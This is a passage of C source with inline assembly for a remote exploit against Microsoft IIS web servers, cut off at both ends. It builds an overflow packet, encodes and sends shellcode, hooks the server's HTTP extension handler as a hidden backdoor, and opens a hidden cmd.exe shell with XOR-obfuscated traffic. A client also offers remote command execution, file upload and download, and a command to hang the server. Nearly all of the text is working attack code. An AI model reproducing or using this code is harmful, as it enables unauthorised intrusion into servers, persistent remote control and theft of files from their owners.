for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
*/
memset(buff,NOPCODE,BUFFSIZE);
/*
strcpy(buff,buff0);
if(argc>6) strcat(buff,argv[6]);
else  strcat(buff,server);
strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");

   strcat(buff,buff1);
*/
strcpy(buff,buff1);
strheadlong=strlen(buff);
OVERADD+=strheadlong-1;

if(argc>2) buff2add=argv[2];
for(;;++buff2add){
temp=*buff2add;
if(temp!='\\'&&temp!='/') break;
}
// printf("\nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"\n offset:%d\n",offset);
// offset+=strheadlong-strlen(buff1);

/*
for(i=0x404;i<=0x500;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
memcpy(buff+offset+i+4,eipexceptwin2000add,4);
}
if(argc>5){
if(strcmp(argv[5],"sp2")==0) {
memcpy(buff+offset+i,"\x58",1);
}
}
for(i=0x220;i<=0x380;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
for(i=0x580;i<=0x728;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
*/
// winnt 0x2cc or 0x71c  win2000 0x130 or 0x468
//  memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(shellcodebuff2,NOPCODE,BUFFSIZE);
i=0x1000;
memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);

shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
}

for(k=0;k<=BUFFSIZE;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
//  k+=0x
memcpy(shellcodebuff,shellcodefnadd,k); //j);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(j=0;j<0x400;++j){
if(memcmp(str+j,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,j);
sendpacketlong=k+j;
for(k=0;k<=0x200;++k){
         if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
}
for(j=0;j<sendpacketlong;++j){
         temp=shellcodebuff[j];
//       temp^=DATAXORCODE;
         shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
         ++k;
         shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
         ++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
for(j=0;j<=0xe000;j+=4){
strcat(shellcodebuff2,"\x41\x41\x41\x41");  //  0x2d  sub eax,num32
// strcat(shellcodebuff2,eipexceptwin2000cn);
}
/*
strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\
x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\
x90");
for(j=0;j<=0xb00;j+=4){
strcat(shellcodebuff2,"\x90\x90\x90\x2d");  //  0x2d  sub eax,num32
}
*/
// printf("\nbuff:%s",buff);
printf("\n shellcode long 0x%x\n",sendpacketlong);
if(argc>4&&strcmp(argv[4],"apache")==0){
strcat(buff," ");
}
else  strcat(buff,buff3);
printf("\n packetlong:0x%x\n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else  strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else  strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
printf("\n for %s system\n",argv[4]);
strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("\n send buff:\n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("\nSEH=0x%x\n",i);
*/
/*
for(i=0;i<8;++i){
temp=buff7[i];
printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
strcat(buff,buff7);
}
*/
// printf("\nbuff=%s\n",buff);
// strcat(buff,"\r\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
//  printf("buff:\n%s",buff+0x10000);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
//    buff[0x2000]=0;
fprintf(stderr,"\n send  packet %d bytes.",j);
//    gets(buff);
send(fd,buff,j,0);
buff7[0]=MCBSIZE;

j=MEMSIZE+0x10;
i=0;
if(argc>4&&strcmp(argv[4],"winxp")==0)
{
j=0x18;
i=8;
}
for(k=0;i<0xc000;i+=0x10){
if(i>=j) {

k=((i-j)/(MCBSIZE*8));
if(k<=6){
memcpy(buff7+0x8,buff10,8);
buff7[0x8]=buff8[k];
buff7[0xc]=buff9[k];
}
else memcpy(buff7,buff11,0x10);
}
memcpy(buff+i,buff7,0x10);

}
if(argc>4&&strcmp(argv[4],"apache")==0){
for(k=0xb000;k<=0xc000;k+=2)
{
memset(buff+k,0x0d,1);
memset(buff+k+1,0x0a,1);
}
buff[0xc000]=0;
//    for(k=0;k<0x10;++k)    send(fd,buff,0xc000,0);
//    printf("\nbuff:%s\n",buff);
}
else send(fd,buff,0xc000,0);

k=0;
ioctlsocket(fd, FIONBIO, &k);
j=0;
while(j==0){
k=newrecv(fd,recvbuff,BUFFSIZE,0);
if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
xordatabegin=1;
fprintf(stderr,"\n ok!recv %d bytes\n",k);
recvbuff[k]=0;
//          printf("\n recv:%s",recvbuff);
//          for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int*)(recvbuff+8+4*j));
k=-1;
j=1;
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n  recv:\n %s",recvbuff);
}
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
/*
for(i=0;i<strlen(SRLF);++i){
SRLF[i]^=DATAXORCODE;
}
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
*/
k=1;
l=0;
while(k!=0){
if(k<0){
l=0;
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iish",4)==0){
iishelp();
                     i=2;
}
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
                     i=2;
}
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
                     i=2;
}
if(memcmp(buff,"iiscmd",6)==0){
                     iiscmd(fd,buff+6);
                     i=2;
}
if(memcmp(buff,"iisreset",8)==0){
                     iisreset(fd,buff+6);
                     i=2;
}
if(memcmp(buff,"iisdie",6)==0){
                     iisdie(fd,buff+6);
                     i=2;
}
if(i==2)i=0;
else i=1;
}

k=strlen(buff);

memcpy(buff+k,SRLF,3);
//    send(fd,SRLF,strlen(SRLF),0);
//    fprintf(stderr,"%s",buff);
/*
for(i=0;i<k+2;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
//             buff[i]^=DATAXORCODE;
}
            send(fd,buff,k+2,0);
*/
newsend(fd,buff,k+2,0);
//       send(fd,SRLF,strlen(SRLF),0);
}
k=newrecv(fd,buff,BUFFSIZE,0);
if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
xordatabegin=1;
k=-1;
}
if(k>0){
//       fprintf(stderr,"recv %d bytes",k);
/*
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
*/
l=0;
buff[k]=0;
fprintf(stderr,"%s",buff);
}
else{
Sleep(20);
if(l<20) k=1;
++l;

}
//    if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void  shellcodefnlock()
{
   _asm{
   nop
   nop
   nop
   nop
   nop
   nop
   nop
   nop

   jmp next1
getediadd:    pop edi
mov esp,edi
and esp,0xfffff0f0
jmp next2
getshelladd:
   push  0x01
   mov eax,edi
   inc eax
   inc eax
   inc eax
   inc eax
   inc eax
   mov edi,eax
   mov esi,edi
   //       sub sp,8
   xor ecx,ecx
looplock:    lodsb
   cmp  al,cl
   jz shell
   sub  al,DATABASE
   mov  ah,al
   lodsb
   sub  al,DATABASE
   shl  ah,4
   add  al,ah
   //       lea  eax,ptr word [edx*4+al]
   stosb
   jmp looplock
next1:       call  getediadd
next2:       call  getshelladd
shell:
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP


   }
}
void shellcodefn(char *ecb)
{ char       Buff[SHELLBUFFSIZE+2];
int       *except[3];
FARPROC    memcpyadd;
FARPROC    msvcrtdlladd;
FARPROC    HttpExtensionProcadd;
FARPROC    Aspdlladd;

FARPROC    RtlEnterCriticalSectionadd;
FARPROC    Ntdlladd;
FARPROC    Sleepadd;
FARPROC    GetLastErroradd;
FARPROC    GetFileSizeadd;
FARPROC    CreateFileAadd;
FARPROC    WriteFileadd;
FARPROC    ReadFileadd;
FARPROC    PeekNamedPipeadd;
FARPROC    CloseHandleadd;
FARPROC    CreateProcessadd;
FARPROC    CreatePipeadd;
FARPROC       procloadlib;
FARPROC    apifnadd[1];
FARPROC    procgetadd=0;
FARPROC    writeclient;
FARPROC    readclient;
HCONN    ConnID;
FARPROC    shellcodefnadd=ecb;
char       *stradd,*stradd2,*dooradd;
int       imgbase,fnbase,i,k,l,thedoor;
HANDLE    libhandle;
int       fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
HANDLE    hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int       lBytesRead;
int  lockintvar1,lockintvar2;
char lockcharvar;
int  shelllocknum;
// unsigned char temp;
SECURITY_ATTRIBUTES sa;

_asm {          jmp nextcall
getstradd: pop stradd
   lea EDI,except
   mov eax,dword ptr FS:[0]
   mov dword ptr [edi+0x08],eax
   mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
   call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
   imgbase+=0x10000;
   if(imgbase==0x78000000) imgbase=0xbff00000;
   if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
   *)(imgbase+0x3c))=='EP'){
   fnbase=*(int *)(imgbase+*(int
   *)(imgbase+0x3c)+0x78)+imgbase;
   k=*(int *)(fnbase+0xc)+imgbase;
   if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
   libhandle=imgbase;
   k=imgbase+*(int *)(fnbase+0x20);
   for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
   if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int
   *)(4+imgbase+*(int *)k)=='Acor')
   {
   k=*(WORD *)(l+l+imgbase+*(int
   *)(fnbase+0x24));
   k+=*(int *)(fnbase+0x10)-1;
   k=*(int *)(k+k+k+k+imgbase+*(int
   *)(fnbase+0x1c));
   procgetadd=k+imgbase;
   break;
   }
   }
   }
   }
}
//搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
//注意这儿处理了搜索页面不在情况。
if(procgetadd==0) goto  die ;
i=stradd;
for(k=1;*stradd!=0;++k) {
   if(*stradd==0x9) libhandle=procloadlib(stradd+1);
   else    apifnadd[k]=procgetadd(libhandle,stradd);
   for(;*stradd!=0;++stradd){
   }
   ++stradd;
}
++stradd;
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
k=stradd;
stradd=i;
thedoor=0;
i=0;
_asm{
   jmp  getdoorcall
getdooradd:    pop  dooradd;
   mov  l,esp
   call getexceptretadd
}
if(i==0){
   ++i;
   if(*(int *)ecb==0x90){
   if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
   i=0;
   thedoor=1;
   }
   }
}
if(i!=0){
   *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
   *(int *)(dooradd-0x13)=shellcodefnadd;
   ecb=0;
   _asm{
   call getexceptretadd
   }
   i=ecb;
   i&=0xfffff000;
   ecb=i;
   ecb+=0x1000;
   for(;i<l;++i,++ecb)
   {
   if(*(int *)ecb==0x90){
   if(*(int *)(ecb+8)==(int *)ecb){
   if(*(int *)*(int *)(ecb+0x64)=='ok!!') break;
   }
   }
   }
   i=0;
   _asm{
   call getexceptretadd
   }
   i&=0xfffff000;
   i+=0x1000;
   for(;i<l;++i){
   if(*(int *)i==HttpExtensionProcadd){
            *(int *)i=dooradd-7;
   // break;
   }
   }
   // *(int *)(dooradd-0x0c)=HttpExtensionProcadd;

}
writeclient= *(int *)(ecb+0x84);
readclient = *(int *)(ecb+0x88);
ConnID    = *(int *)(ecb+8) ;
stradd=k;
_asm{
   lea edi,except
   mov eax,dword ptr [edi+0x08]
   mov dword ptr fs:[0],eax
}
if(thedoor==0){
   _asm{
   mov eax,0xffffffff
   mov dword ptr fs:[0],eax
   }
}
stradd2=stradd;
stradd+=8;
k=0x20;
writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
//          Sleepadd(100);

shelllocknum=LOCKBIGNUM2;
if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int
   *)(ecb+0x64)+4)=='notx') shelllocknum=0;

// iiscmd:
lockintvar1=shelllocknum%LOCKBIGNUM;
lockintvar2=lockintvar1;
iiscmd:
/*
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
*/
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
   lea EDI,siinfo
   xor eax,eax
   mov ecx,0x11
   repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
k=0;
// while(k==0)
// {
k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,
   &ProcessInformation);
//       stradd+=8;
// }
Sleepadd(200);
//       PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);

i=0;
while(1) {
   PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
   if(lBytesRead>0) {
   i=0;
   ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
   if(lBytesRead>0) {
   for(k=0;k<lBytesRead;++k){
               lockintvar2=lockintvar2*0x100;
               lockintvar2=lockintvar2%LOCKBIGNUM;
               lockcharvar=lockintvar2%0x100;
               Buff[k]^=lockcharvar; // DATAXORCODE;
   //             Buff[k]^=DATAXORCODE;
   }
   writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
   //             Sleepadd(20);
   }
   }
   else{
   //                Sleepadd(10);
   l=0;
   if(i<50){
   l=1;
   ++i;
   k=1;
   lBytesRead=0;
   }



   while(l==0){
   i=0;
   lBytesRead=SHELLBUFFSIZE;
   k=readclient(ConnID,Buff,&lBytesRead);
   for(l=0;l<lBytesRead;++l){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
   Buff[l]^=lockcharvar; // DATAXORCODE;
   }

   if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
   k=8;
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit    cmd.exe
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
   stradd2=Buff+5;
   Buff[lBytesRead]=0;
   goto iiscmd;
   }
   if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){


   lBytesRead=0x0c;
   writeclient(ConnID,stradd+0x11,&lBytesRead,0);
   lockintvar1=shelllocknum%LOCKBIGNUM;
   lockintvar2=lockintvar1;
   lBytesRead=0;
   }
   if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
   k=8;
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit  cmd.exe
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
   *(int *)(dooradd-0x0c)=0;
   Sleepadd(0x7fffffff);
   _asm{
   mov eax,0
   mov esp,0
   jmp eax
   }
   }


   if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]
   ==' ')
   {
   l=*(int *)(Buff+4);
   //
   WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
   fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+
   GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
   );
   k=GetLastErroradd();
   i=0;
   while(l>0){
   lBytesRead=SHELLBUFFSIZE;
   k=readclient(ConnID,Buff,&lBytesRead);
   if(k==1){
   if(lBytesRead>0){
   for(k=0;k<lBytesRead;++k){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
   Buff[k]^=lockcharvar; //
   DATAXORCODE;
   }

   l-=lBytesRead;
   //    if(fpt>0)

   WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
   //                            else Sleepadd(010);
   }

   //                         if(i>100) l=0;
   }
   else {
   Sleepadd(0100);
   ++i;
   }
   if(i>10000) l=0;
   }

   CloseHandleadd(fpt);
   l=0;
   }
   else{

   if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]
   ==' '){

   //
   fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);


   fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,
   NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
   Sleepadd(100);
   l=GetFileSizeadd(fpt,&k);
   *(int *)Buff='ezis';       //size
   *(int *)(Buff+4)=l;
   lBytesRead=8;
   for(i=0;i<lBytesRead;++i){
   lockintvar2=lockintvar2*0x100;
   lockintvar2=lockintvar2%LOCKBIGNUM;
   lockcharvar=lockintvar2%0x100;
   Buff[i]^=lockcharvar; // DATAXORCODE;
   }

   writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
   //    Sleepadd(100);
   i=0;
   while(l>0){
   k=SHELLBUFFSIZE;
   ReadFileadd(fpt,Buff,k,&k,0);
   if(k>0){
   for(i=0;i<k;++i){
   lockintvar2=lockintvar2*0x100;
   lockintvar2=lockintvar2%LOCKBIGNUM
   ;
   lockcharvar=lockintvar2%0x100;
   Buff[i]^=lockcharvar; //
   DATAXORCODE;
   }

   i=0;
   l-=k;
   writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
   //                                  Sleepadd(100);
   //
   k=readclient(ConnID,Buff,&lBytesRead);

   }
   else ++i;
   if(i>100) l=0;
   }
   CloseHandleadd(fpt);
   l=0;
   }
   else l=1;
   }
               }
               if(k!=1){
   k=8;
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
   WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
   k=GetLastErroradd();
   while(k==0x2746){
   if(thedoor==1)    goto asmreturn;
   Sleepadd(0x7fffffff);                //僵死
   }

               }
               else{

   WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
   //             Sleepadd(1000);
               }
         }
   }

die: goto die  ;
   _asm{
asmreturn:
   mov eax,HSE_STATUS_SUCCESS
   leave
   ret 04
door:             push eax
   mov eax,[esp+0x08]
   mov eax,[eax+0x64]
   mov eax,[eax]
   cmp eax,'ok!!'
   jnz jmpold
   pop eax
   push 0x12345678  //dooradd-0x13
   ret
jmpold:             pop  eax
                  push 0x12345678 //dooradd-0xc
                  ret             //1
                  jmp  door       //2
getdoorcall:    call getdooradd //5

getexceptretadd: pop  eax
   push eax
   mov  edi,dword ptr [stradd]
   mov dword ptr [edi-0x0e],eax
   ret
errprogram:          mov eax,dword ptr [esp+0x0c]
                  add eax,0xb8
                  mov dword ptr [eax],0x11223344  //stradd-0xe
                  xor eax,eax             //2
                  ret                      //1
execptprogram:    jmp errprogram          //2 bytes    stradd-7
nextcall:       call getstradd          //5 bytes
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   NOP
   }
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
   int i,k;
   unsigned char temp;
   char *calladd;
   for(i=0;i<len;++i){
   temp=shellbuff[i];
   if(temp==0xe8){
   k=*(int *)(shellbuff+i+1);
   calladd=fnadd;
   calladd+=k;
   calladd+=i;
   calladd+=5;
   if(calladd==chkesp){
   shellbuff[i]=0x90;
   shellbuff[i+1]=0x43; // inc ebx
   shellbuff[i+2]=0x4b; // dec ebx
   shellbuff[i+3]=0x43;
   shellbuff[i+4]=0x4b;
   }
   }
   }
}
void iisput(int fd,char *str){
   char *filename;
   char *filename2;
   FILE *fpt;
   char buff[0x2000];
   int size=0x2000,i,j,filesize,filesizehigh;
   filename="\0";
   filename2="\0";
   j=strlen(str);
   for(i=0;i<j;++i,++str){
   if(*str!=' '){
   filename=str;
   break;
   }
   }
   for(;i<j;++i,++str){
   if(*str==' ') {
   *str=0;
   break;
   }
   }
   ++i;
   ++str;
   for(;i<j;++i,++str){
   if(*str!=' '){
   filename2=str;
   break;
   }
   }
   for(;i<j;++i,++str){
   if(*str==' ') {
   *str=0;
   break;
   }
   }
   if(filename=="\x0") {
   printf("\n iisput filename [path\\fiename]\n");
   return;
   }
   if(filename2=="\x0") filename2=filename;
   printf("\n begin put file:%s",filename);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   Sleep(1000);
   fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,
   FILE_ATTRIBUTE_NORMAL,0);
   filesize=GetFileSize(fpt,&filesizehigh);
   strcpy(buff,"put ");
   *(int *)(buff+4)=filesize;
   filesize=*(int *)(buff+4);
   strcpy(buff+0x8,filename2);
   newsend(fd,buff,i+0x9,0);
   printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
   Sleep(1000);
   while(filesize>0){
   size=0x800;
   ReadFile(fpt,buff,size,&size,NULL);
   if(size>0){
   filesize-=size;
   newsend(fd,buff,size,0);
   //       Sleep(0100);

   }
   }
   // size=filesize;
   // ReadFile(fpt,buff,size,&size,NULL);
   // if(size>0) send(fd,buff,size,0);
   CloseHandle(fpt);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
   printf("\n put file ok!\n");
   Sleep(1000);
}
void iisget(int fd,char *str){
   char *filename;
   char *filename2;
   FILE *fpt;
   char buff[0x2000];
   int size=0x2000,i,j,filesize,filesizehigh;
   filename="\0";
   filename2="\0";
   j=strlen(str);
   for(i=0;i<j;++i,++str){
   if(*str!=' '){
   filename=str;
   break;
   }
   }
   for(;i<j;++i,++str){
   if(*str==' ') {
   *str=0;
   break;
   }
   }
   ++i;
   ++str;
   for(;i<j;++i,++str){
   if(*str!=' '){
   filename2=str;
   break;
   }
   }
   for(;i<j;++i,++str){
   if(*str==' ') {
   *str=0;
   break;
   }
   }
   if(filename=="\x0") {
   printf("\n iisget filename [path\\fiename]\n");
   return;
   }
   if(filename2=="\x0") filename2=filename;
   printf("\n begin get file:%s",filename);
   fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
   strcpy(buff,"get ");
   strcpy(buff+0x4,filename2);
   newsend(fd,buff,i+0x5,0);
   printf("\n get file:%s from file:%s",filename,filename2);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   i=0;
   filesize=0;
   j=0;
   while(j<100){
   // Sleep(100);
   i=newrecv(fd,buff,0x800,0);
   if(i>0){
   buff[i]=0;
   if(memcmp(buff,"size",4)==0){
   filesize=*(int *)(buff+4);
   j=100;
   }
   else {

   /*             for(j=0;j<i;++j){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
   buff[j]^=lockcharvar; // DATAXORCODE;
   }
   */
   j=0;
   printf("\n recv %s",buff);
   }
   }
   else ++j;
   // if(j>1000) i=0;
   }
   printf("\n file %d bytes %d\n",filesize,i);
   if(i>8){
   i-=8;
   filesize-=i;
   WriteFile(fpt,buff+8,i,&i,NULL);

   }
   while(filesize>0){
   size=newrecv(fd,buff,0x800,0);
   if(size>0){
   filesize-=size;
   WriteFile(fpt,buff,size,&size,NULL);

   }
   else {
   if(size==0) {
   printf("\n ftp close \n ");
   }
   else {
   printf("\n Sleep(100)");
   Sleep(100);
   }
   }
   }
   CloseHandle(fpt);
   printf("\n get file ok!\n");
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
}
void iisreset(int fd,char *str){
   char buff[0x2000];
   int  i,j;
   printf("\nreset xor data.\n");
   Sleep(1000);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   strcpy(buff,"reset");
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);

   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
   while(1){
   j=recv(fd,buff,0x2000,0);
   if(j>0){
   buff[j]=0;
   for(i=0;i<j;++i){
   if(buff[i]==0) buff[i]='b';
   }
   //    printf("\nrecv 0x%x bytes:%s",j,buff);
   if(strstr(buff,"xordatareset")!=0){
   printf("\nxor data reset ok.\n");
   for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
   buff[i]^=lockcharvar; // DATAXORCODE;
   }

   break;
   }
   }
   //    else if(j==0) break;
   //    strcpy(buff,"\r\nmkdir d:\\test6\r\n");
   //    newsend(fd,buff,strlen(buff),0);
   }
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
   // printf("aaa");
}
void iisdie(int fd,char *str){
   char buff[0x200];
   int  j;
   printf("\niis die.\n");
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   Sleep(1000);
   strcpy(buff,"iisrr ");
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
}
void iiscmd(int fd,char *str){
   char *cmd="\0";
   char buff[2000];
   int  i,j;
   j=strlen(str);
   for(i=0;i<j;++i,++str){
   if(*str!=' '){
   cmd=str;
   break;
   }
   }
   j=strlen(str);
   for(i=0;i<j;++i){
   if(*(str+j-i-1)!=' ') {
   break;
   }
   else *(str+j-i-1)=0;
   }

   if(cmd=="\x0") {
         printf("\niiscmd cmd\n");
         return;
   }
   printf("\nbegin run cmd:%s",cmd);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   Sleep(1000);
   strcpy(buff,"iisc ");
   strcat(buff,cmd);
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
   /*
   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
   */
}
int newrecv(int fd,char *buff,int size,int flag){

   int i,k;
   k=recv(fd,buff,size,flag);
   if(xordatabegin==1){
   for(i=0;i<k;++i){
   lockintvar1=lockintvar1*0x100;
   lockintvar1=lockintvar1%LOCKBIGNUM;
   lockcharvar=lockintvar1%0x100;
